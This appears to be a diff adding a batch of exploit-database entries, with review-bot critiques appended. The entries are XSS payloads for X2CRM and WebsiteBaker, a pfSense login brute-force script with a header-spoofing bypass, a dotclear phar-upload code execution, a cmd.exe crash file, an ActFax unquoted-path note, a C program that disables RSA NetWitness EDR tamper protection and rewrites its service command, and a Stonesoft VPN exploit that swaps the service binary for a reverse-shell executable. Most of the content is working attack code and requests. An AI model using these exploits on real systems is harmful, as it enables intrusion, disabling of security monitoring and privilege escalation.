5d8630d289284e8c14d15b14f4b4dc28=779a63cb39d04cca59b4a3b9b2a4fad817930211a%3A4%3A%7Bi%3A0%3Bs%3A1%3A%224%22%3Bi%3A1%3Bs%3A5%3A%22test2%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=Ncr7UIvK2yPvHzZc8koNW4DaIXxwZnsr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab&Actions%5Bsubject%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&Actions%5Bpriority%5D=1&Actions%5BactionDescription%5D=test
EXPLOITATION
========
1. Create an action
2. Inject payload to the vulnerable parameter in POST request
Payload: %3Cscript%3Ealert(1)%3C%2Fscript%3E
'''
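
Review bot: the `Cookie:` header carries full session values (`PHPSESSID`, `sessionToken`, `YII_CSRF_TOKEN` and two serialized login cookies naming `admin` and `test2`); replace them with placeholders, as they add nothing to the proof of concept. The request path reads `/c2xrm/x2engine/...`, which looks like a typo for `x2crm`, and the EXPLOITATION steps do not say on which page the stored `Actions[subject]` value is rendered.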


@ -0,0 +1,45 @@
# Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Exploit Author: Betul Denizler
# Vendor Homepage: https://x2crm.com/
# Software Link: https://sourceforge.net/projects/x2engine/
# Version: X2CRM v6.6/6.9
# Tested on: Ubuntu Mate 20.04
# Vulnerable Parameter: model
# CVE: Use CVE-2022-48177
# Date: 27.12.2022
'''
POC REQUEST:
========
GET
/x2crm/x2engine/index.php/admin/importModels?model=asd%22%3E%3Cbody%20onload=%22alert(4)%22%3E
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0)
Gecko/20100101 Firefox/108.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: LoginForm[username]=admin; LoginForm[rememberMe]=1;
PHPSESSID=959fpkms4abdhtresce9k9rmk3;
YII_CSRF_TOKEN=e5d14327e116fe92a5feb663d52e0920f1a4adab;
d9ee490d05f512911c1c4614c37db2b8=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
locationTrackingFrequency=60; locationTrackingSwitch=1;
5d8630d289284e8c14d15b14f4b4dc28=15982c76efa545e0e6fcd167baa86541c1ef91eda%3A4%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3Bi%3A2%3Bi%3A2592000%3Bi%3A3%3Ba%3A0%3A%7B%7D%7D;
sessionToken=FFWkdliSAKgtUbP1dKP4iswyYRelqyQ4
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
EXPLOITATION
========
1. Select Import Records Model in admin settings
2. Inject payload to the vulnerable parameter in GET request
Payload: "><body onload="alert(4)">
'''
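
Review bot: `# CVE: Use CVE-2022-48177` has a stray "Use" left in the field; it should read `# CVE: CVE-2022-48177`. The request line is split over three lines (`GET`, the path, `HTTP/1.1`) and several headers are wrapped the same way, so the request is not well-formed as pasted. The `Cookie:` header also carries full session values that should be replaced with placeholders.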


@ -0,0 +1,46 @@
Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)
Application: WebsiteBaker
Version: 2.13.3
Bugs: Stored XSS
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 02.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
steps:
1.Anyone who has the authority to create the page can do this
payload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3E
POST /admin/pages/add.php HTTP/1.1
Host: localhost
Content-Length: 137
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9
Connection: close
b7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add
2. Visit http://localhost/
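
Review bot: the title says only "Cross-Site Scripting (XSS)" while the `Bugs:` field says "Stored XSS"; put "Stored" in the title so the entry is classified correctly. The body starts at section "2. Technical Details & POC" with no section 1, the list under `steps:` runs from "1." to "2. Visit http://localhost/" with the whole request in between, and the text never names the injected parameter (`title` in the POST body).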

95
exploits/php/webapps/51352.py Executable file

@ -0,0 +1,95 @@
#!/usr/bin/python3
## Exploit Title: pfsenseCE v2.6.0 - Anti-brute force protection bypass
## Google Dork: intitle:"pfSense - Login"
## Date: 2023-04-07
## Exploit Author: FabDotNET (Fabien MAISONNETTE)
## Vendor Homepage: https://www.pfsense.org/
## Software Link: https://atxfiles.netgate.com/mirror/downloads/pfSense-CE-2.6.0-RELEASE-amd64.iso.gz
## Version: pfSenseCE <= 2.6.0
## CVE: CVE-2023-27100
# Vulnerability
## CVE: CVE-2023-27100
## CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2023-27100
## Security Advisory: https://docs.netgate.com/downloads/pfSense-SA-23_05.sshguard.asc
## Patch: https://redmine.pfsense.org/projects/pfsense/repository/1/revisions/9633ec324eada0b870962d3682d264be577edc66
import requests
import sys
import re
import argparse
import textwrap
from urllib3.exceptions import InsecureRequestWarning
# Expected Arguments
parser = argparse.ArgumentParser(description="pfsenseCE <= 2.6.0 Anti-brute force protection bypass",
formatter_class=argparse.RawTextHelpFormatter,
epilog=textwrap.dedent('''
Exploit Usage :
./CVE-2023-27100.py -l http://<pfSense>/ -u user.txt -p pass.txt
./CVE-2023-27100.py -l http://<pfSense>/ -u /Directory/user.txt -p /Directory/pass.txt'''))
parser.add_argument("-l", "--url", help="pfSense WebServer (Example: http://127.0.0.1/)")
parser.add_argument("-u", "--usersList", help="Username Dictionary")
parser.add_argument("-p", "--passwdList", help="Password Dictionary")
args = parser.parse_args()
if len(sys.argv) < 2:
print(f"Exploit Usage: ./CVE-2023-27100.py -h [help] -l [url] -u [user.txt] -p [pass.txt]")
sys.exit(1)
# Variable
url = args.url
usersList = args.usersList
passwdList = args.passwdList
# Suppress only the single warning from urllib3 needed.
if url.upper().startswith("HTTPS://"):
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
print('pfsenseCE <= 2.6.0 Anti-brute force protection bypass')
def login(userlogin, userpasswd):
session = requests.session()
r = session.get(url, verify=False)
# Getting CSRF token value
csrftoken = re.search(r'input type=\'hidden\' name=\'__csrf_magic\' value="(.*?)"', r.text)
csrftoken = csrftoken.group(1)
# Specifying Headers Value
headerscontent = {
'User-Agent': 'Mozilla/5.0',
'Referer': f"{url}",
'X-Forwarded-For': '42.42.42.42'
}
# POST REQ data
postreqcontent = {
'__csrf_magic': f"{csrftoken}",
'usernamefld': f"{userlogin}",
'passwordfld': f"{userpasswd}",
'login': 'Sign+In'
}
# Sending POST REQ
r = session.post(url, data=postreqcontent, headers=headerscontent, allow_redirects=False, verify=False)
# Conditional loops
if r.status_code != 200:
print(f'[*] - Found Valid Credential !!')
print(f"[*] - Use this Credential -> {userlogin}:{userpasswd}")
sys.exit(0)
# Reading User.txt & Pass.txt files
userfile = open(usersList).readlines()
passfile = open(passwdList).readlines()
for user in userfile:
user = user.strip()
for passwd in passfile:
passwd = passwd.strip()
login(user, passwd)
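
Review bot: nothing in the script or its header says what performs the bypass; the only unusual element in the request is the fixed `'X-Forwarded-For': '42.42.42.42'` entry in `headerscontent`, so add a comment explaining its role and how it relates to the linked sshguard advisory and patch. In `login()`, `csrftoken.group(1)` is called without checking that `re.search` matched, and any status other than 200 is reported as "Found Valid Credential", so an error response is misreported as a successful login. The `len(sys.argv) < 2` check runs after `parse_args()` and no option is marked `required=True`, so a missing `-l`, `-u` or `-p` ends in an exception rather than a usage message.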


@ -0,0 +1,50 @@
Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)
Application: dotclear
Version: 2.25.3
Bugs: Remote Code Execution (RCE) (Authenticated) via file upload
Technology: PHP
Vendor URL: https://dotclear.org/
Software Link: https://dotclear.org/download
Date of found: 08.04.2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
While writing a blog post, we know that we can upload images. But php did not allow file upload. This time
<?php echo system("id"); ?>
I wrote a file with the above payload, a poc.phar extension, and uploaded it.
We were able to run the php code when we visited your page
poc request:
POST /dotclear/admin/post.php HTTP/1.1
Host: localhost
Content-Length: 566
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1cc
Connection: close
post_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=
poc video : https://youtu.be/oIPyLqLJS70
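
Review bot: the request under "poc request:" is the `post.php` save that links to `/dotclear/public/poc.phar`, not the handling of the uploaded file itself, so the step the title depends on is undocumented; say which upload function accepted the `.phar` extension so the filter can be located and fixed. The sentence "But php did not allow file upload. This time" breaks off, and "when we visited your page" should name the URL that was visited.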


@ -0,0 +1,38 @@
# Exploit Title: Microsoft Windows 11 - 'cmd.exe' Denial of Service
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Date: 2023-03-30
# Vendor Homepage: https://www.microsoft.com/en-us
# Software Link: https://www.microsoft.com/en-us
# Tested Version: N/A
# Tested on OS: Windows 11 Pro
# [ About App ]
Microsoft Windows is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Arbitrary code execution may be possible, but this has not been confirmed.
This issue affects Microsoft Windows 11 Pro.
Note: Further analysis reveals that this is not a vulnerability; this BID is now retired.
# [ POC ]
# 1.Run the python script, it will create a new file "PoC.txt"
# 2.Run Command Prompt
# 3.Copy the content of the file "PoC.txt"
# 4.Paste the content of dos.txt into the lin cmd.exe
# 5.Crashed ;)
#!/usr/bin/env python
buffer = "A" * 339839907
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
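Review bot: The header contradicts the title: the "About App" text ends with "Further analysis reveals that this is not a vulnerability; this BID is now retired", yet the entry is filed as a 'cmd.exe' Denial of Service with "Tested Version: N/A". Either remove that text, which reads as boilerplate carried over from another advisory, or reclassify the entry, and record the Windows 11 build that was tested. The steps also disagree with the script: step 4 says to paste the content of dos.txt while the script writes PoC.txt, and the print statements are Python 2 syntax under a "#!/usr/bin/env python" shebang, so the interpreter version should be stated. The bare "except:" hides the actual I/O error.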

@ -0,0 +1,44 @@
# Exploit Title: ActFax 10.10 - Unquoted Path Services
# Date: 22/03/2023
# Exploit Author: Birkan ALHAN (@taftss)
# Vendor Homepage: https://www.actfax.com
# Software Link: https://www.actfax.com/en/download.html
# Version: Version 10.10, Build 0551 (2023-02-01)
# Tested on: Windows 10 21H2 OS Build 19044.2728
#Discover to Unquoted Services Path:
C:\Users\taftss>sc qc ActiveFaxServiceNT
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ActiveFaxServiceNT
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\ActiveFax\Server\ActSrvNT.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : ActiveFax-Server-Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\taftss>systeminfo
Host Name: RedsTaftss
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19044 N/A Build 19044
#Another Discover Methot to Unquoted Services Path:
wmic service get name,displayname,pathname,startmode | findstr /i
"auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
#Exploit:
If the attacker has taken over the system and the taken user has write
privileges to the "C:\Program Files\ActiveFax" folder or "C:\", they
can inject their own malicious "ActSrvNT.exe" file. Then the
ActiveFaxServiceNT Service can be restarted to privilege escalation.
--
*Birkan ALHAN*
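Review bot: The "#Exploit" paragraph does not match the path shown in the "sc qc" output. BINARY_PATH_NAME is "C:\Program Files\ActiveFax\Server\ActSrvNT.exe", whose only space is in "Program Files", so the unquoted-path condition concerns the root of C:\ only; write access to "C:\Program Files\ActiveFax" and replacing ActSrvNT.exe there is a separate weak-directory-permission condition, and no ACL output is shown to support either one. Split the two claims, include the directory ACLs that were actually observed on the tested build, and add the remediation, which is quoting the service's image path. The wmic one-liner is also wrapped across two lines mid-pipeline; keep it on one line.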

@ -0,0 +1,285 @@
# Exploit Title: RSA NetWitness Platform 12.2 - Incorrect Access Control / Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
RSA Security
www.netwitness.com
[Product]
NetWitness Endpoint EDR Agent
The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibility
into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly
detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.
[Vulnerability Type]
Incorrect Access Control / Code Execution
[CVE Reference]
CVE-2022-47529
[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.
Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local
and admin Windows user accounts to modify the endpoint agent service configuration:
to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.
Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.
SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d
LANDeskService.exe
[Severity]
Critical
[Impact(s)]
Denial-of-Service
Arbitrary Code Execution
[Attack Vector]
To exploit, open handle to memory objects held by the endpoint agent,
modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group
[Affected Product Code Base]
All versions prior to v12.2
[Network Access]
Local
[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935
[Vuln Code Block]:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
[Exploit/POC]
"RSA_NetWitness_Exploit.c"
#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"
#define OPEN_ALL_ACCESS 0x1F0003
/*
RSA NetWitness EDR Endpoint Agent
Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49
Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.
By John Page (hyp3rlinx) - Nov 2022
DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.
X64 PE file vuln code block:
00000001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:00000001400F7B10 ; sub_14013BA50+19?p
.text:00000001400F7B10 ; DATA XREF: ...
.text:00000001400F7B10 push rbx
.text:00000001400F7B12 sub rsp, 20h
.text:00000001400F7B16 mov rbx, rcx
.text:00000001400F7B19 test rcx, rcx
.text:00000001400F7B1C jz short loc_1400F7B5C
.text:00000001400F7B1E call cs:InitializeCriticalSection
.text:00000001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:00000001400F7B28 call cs:InitializeCriticalSection
.text:00000001400F7B2E mov edx, 1 ; bManualReset
.text:00000001400F7B33 xor r9d, r9d ; lpName
.text:00000001400F7B36 mov r8d, edx ; bInitialState
.text:00000001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:00000001400F7B3B call cs:CreateEventW
.text:00000001400F7B41 mov [rbx+50h], rax
.text:00000001400F7B45 mov dword ptr [rbx+58h], 0
.text:00000001400F7B4C test rax, rax
.text:00000001400F7B4F jz short loc_1400F7B5C
1) Install "RSA NetWitness.msi" (Endpoint EDR Agent)
2) Run Exploit PoC as a Standard non-admin user, the PoC will:
a) Open a handle (copy) to Ecat002 event.
b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.
c) Set/Reset event the Ecat002 handle.
d) if admin privs change the EDR service configuration
Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln.
*/
char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};
BOOL PWNED=FALSE;
void Exploit();
int AdminChl();
void HijackSvcConfig();
int main(void){
printf("[+] RSA NetWitness EDR Agent 0Day\n");
printf("[+] CVE-2022-47529\n");
printf("[+] Discovery: John Page (aka hyp3rlinx)\n");
printf("[+] ===================================\n");
Exploit();
if( AdminChk() ){
printf("[+] Hijacked NetWitness Agent Service!\n");
HijackSvcConfig();
}
Sleep(2000);
printf("[+] Done!\n\n");
system("pause");
return 0;
}
void Exploit(){
PACL pOldDACL = NULL;
PACL pNewDACL = NULL;
HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");
int i=0;
for(; i < sizeof(Vuln_Events) / sizeof(Vuln_Events[0]); i++){
HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);
if(hEvent != INVALID_HANDLE_VALUE){
printf("[-] Targeting Event: %s\n", Vuln_Events[i]);
Sleep(500);
if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){
TRUSTEE trustee[1];
trustee[0].TrusteeForm = TRUSTEE_IS_NAME;
trustee[0].TrusteeType = TRUSTEE_IS_GROUP;
trustee[0].ptstrName = TEXT("Everyone");
trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;
trustee[0].pMultipleTrustee = NULL;
EXPLICIT_ACCESS explicit_access_list[1];
ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));
explicit_access_list[0].grfAccessMode = DENY_ACCESS;
explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;
explicit_access_list[0].grfInheritance = NO_INHERITANCE;
explicit_access_list[0].Trustee = trustee[0];
if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}
if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){
printf("%s%d", "[!] Not vulnerable! ", GetLastError());
}else{
SetEvent(hEvent_Ecat002);
Sleep(1000);
ResetEvent(hEvent_Ecat002);
CloseHandle(hEvent_Ecat002);
SetEvent(hEvent);
Sleep(1000);
PWNED=TRUE;
}
if(PWNED){
LocalFree(pNewDACL);
LocalFree(pOldDACL);
CloseHandle(hEvent);
}
Sleep(1000);
}
}
}
}
//If run as admin, modify the agent service config to run our own code.
int AdminChk(){
int result = 0;
HANDLE hToken = NULL;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){
TOKEN_ELEVATION elevated;
DWORD tokSize = sizeof(TOKEN_ELEVATION);
if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){
result = elevated.TokenIsElevated;
}
}
if(hToken){
CloseHandle(hToken);
}
return result;
}
//Trivial example modify the service config...
void HijackSvcConfig(){
Sleep(1000);
WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);
}
[POC Video URL]
https://www.youtube.com/watch?v=kO1fu4IOlSs
[Disclosure Timeline]
Vendor Notification: December 2, 2022
CVE assigned: December 19, 2022
Hotfix v12.1.0.1: January 3, 2023
Fixed in v12.2.0.0 January 4, 2023
Restested for vendor: January 6, 2023
March 24, 2023 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
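Review bot: The entry title names "RSA NetWitness Platform 12.2" as the affected release, but the advisory body says "All versions prior to v12.2" and the timeline says "Fixed in v12.2.0.0", so anyone triaging by title will flag patched agents; retitle to the affected range. In the C source, the prototype "int AdminChl();" does not match the AdminChk() that is defined and called, and the test "if(hEvent != INVALID_HANDLE_VALUE)" cannot detect failure because OpenEventA returns NULL on error. That matters here because the comment block offers the program to customers as a check for whether an agent is vulnerable, and a host without the events will not reliably print "Not vulnerable". The quoted disassembly also shows CreateEventW called with lpName zeroed, an unnamed event, while the advisory text and source refer to the named events Global\Ecat002 and Global\Ecat004; say how the listing relates to those objects, and keep one copy of it rather than two.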

@ -0,0 +1,140 @@
# Exploit Title: Stonesoft VPN Client 6.2.0 / 6.8.0 - Local Privilege Escalation
# Exploit Author : TOUHAMI KASBAOUI
# Vendor Homepage : https://www.forcepoint.com/
# Software: Stonesoft VPN Windows
# Version : 6.2.0 / 6.8.0
# Tested on : Windows 10
# CVE : N/A
#Description local privilege escalation vertical from Administrator to NT AUTHORITY / SYSTEM
#define UNICODE
#define _UNICODE
#include <Windows.h>
#include <iostream>
using namespace std;
enum Result
{
unknown,
serviceManager_AccessDenied,
serviceManager_DatabaseDoesNotExist,
service_AccessDenied,
service_InvalidServiceManagerHandle,
service_InvalidServiceName,
service_DoesNotExist,
service_Exist
};
Result ServiceExists(const std::wstring& serviceName)
{
Result r = unknown;
SC_HANDLE manager = OpenSCManager(NULL, SERVICES_ACTIVE_DATABASE, GENERIC_READ);
if (manager == NULL)
{
DWORD lastError = GetLastError();
if (lastError == ERROR_ACCESS_DENIED)
return serviceManager_AccessDenied;
else if (lastError == ERROR_DATABASE_DOES_NOT_EXIST)
return serviceManager_DatabaseDoesNotExist;
else
return unknown;
}
SC_HANDLE service = OpenService(manager, serviceName.c_str(), GENERIC_READ);
if (service == NULL)
{
DWORD error = GetLastError();
if (error == ERROR_ACCESS_DENIED)
r = service_AccessDenied;
else if (error == ERROR_INVALID_HANDLE)
r = service_InvalidServiceManagerHandle;
else if (error == ERROR_INVALID_NAME)
r = service_InvalidServiceName;
else if (error == ERROR_SERVICE_DOES_NOT_EXIST)
r = service_DoesNotExist;
else
r = unknown;
}
else
r = service_Exist;
if (service != NULL)
CloseServiceHandle(service);
if (manager != NULL)
CloseServiceHandle(manager);
return r;
}
bool ChangeName() {
LPCWSTR parrentvpnfilename = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe";
LPCWSTR newName = L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn_old.exe";
bool success = MoveFile(parrentvpnfilename, newName);
if (success) {
cerr << "[+] SVGVPN filename changed.\n";
}
else {
cerr << "Failed to rename file \n";
}
return 0;
}
int main() {
const uint8_t shellcode[7168] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
}; //You can set array bin of your reverse shell PE file here
std::wstring serviceName = L"sgipsecvpn";
Result result = ServiceExists(serviceName);
if (result == service_Exist)
std::wcout << L"The VPN service '" << serviceName << "' exists." << std::endl;
else if (result == service_DoesNotExist)
std::wcout << L"The service '" << serviceName << "' does not exist." << std::endl;
else
std::wcout << L"An error has occurred, and it could not be determined whether the service '" << serviceName << "' exists or not." << std::endl;
ChangeName();
HANDLE fileHandle = CreateFile(L"C:\\Program Files (x86)\\Forcepoint\\Stonesoft VPN Client\\sgvpn.exe", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
cerr << "[*] Loading Malicious file into main PE of Forcepoint Installer \n";
if (fileHandle == INVALID_HANDLE_VALUE) {
cerr << "Failed to create shellcode\n";
return 1;
}
DWORD bytesWritten;
if (!WriteFile(fileHandle, shellcode, sizeof(shellcode), &bytesWritten, NULL)) {
cerr << "Failed to write to file\n";
CloseHandle(fileHandle);
return 1;
}
CloseHandle(fileHandle);
cout << "[+] Payload exported to ForcePointVPN \n";
Sleep(30);
cout << "[+] Restart ForcePointVPN Service \n";
SC_HANDLE scmHandle = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
SC_HANDLE serviceHandle = OpenService(scmHandle, TEXT("sgipsecvpn"), SERVICE_ALL_ACCESS);
SERVICE_STATUS serviceStatus;
QueryServiceStatus(serviceHandle, &serviceStatus);
if (serviceStatus.dwCurrentState == SERVICE_RUNNING) {
ControlService(serviceHandle, SERVICE_CONTROL_STOP, &serviceStatus);
while (serviceStatus.dwCurrentState != SERVICE_STOPPED) {
QueryServiceStatus(serviceHandle, &serviceStatus);
Sleep(1000);
}
}
StartService(serviceHandle, NULL, NULL);
CloseServiceHandle(serviceHandle);
CloseServiceHandle(scmHandle);
return 0;
}
